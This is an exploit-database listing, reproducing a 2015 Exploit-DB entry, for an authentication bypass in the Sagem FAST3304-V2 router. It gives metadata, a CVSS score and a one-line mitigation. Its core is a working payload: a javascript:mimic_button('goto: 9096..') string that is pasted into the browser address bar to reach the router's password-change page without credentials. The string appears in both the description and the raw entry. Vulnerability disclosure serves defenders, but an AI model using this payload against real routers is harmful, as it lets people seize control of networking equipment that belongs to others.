Sagem javascript injection

vendor:

FAST3304-V2

by:

Soufiane Alami Hassani

6,4

CVSS

MEDIUM

javascript injection

CWE

Product Name: FAST3304-V2

Affected Version From: FAST3304-V2

Affected Version To: FAST3304-V2

Patch Exists: No

Related CWE: None

CPE: None

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 8.1 Pro

2015

You can change the password of your router even if you have not the access. In Bar address copy and paste : 'javascript:mimic_button('goto: 9096..')' the router redirect you to another page to change the password.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in any application logic.

Source

Exploit-DB raw data:

================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____ 
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/ 
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \ 
                                                      
================================================================================


######################################################
# Exploit Title: Sagem javascript injection 
# Date: 27/10/15
# Exploit Author: Soufiane Alami Hassani
# Version: FAST3304-V2
# Tested on: [Windows 8.1 Pro]
# Category : webapps
# Facebook : soufiane.a.hassani
# Email    : nios1515@gmail.com
######################################################


###########################
#By Soufiane Alami Hassani#
###########################

Vulnerability Description : You can change the password of your router even if you have not the access.

Exploit : In Bar address copy and paste : "javascript:mimic_button('goto: 9096..')" the router redirect you to another page to change the password .

########################
Moroccan Are The Best .
########################


mimic_button('goto: 9096..')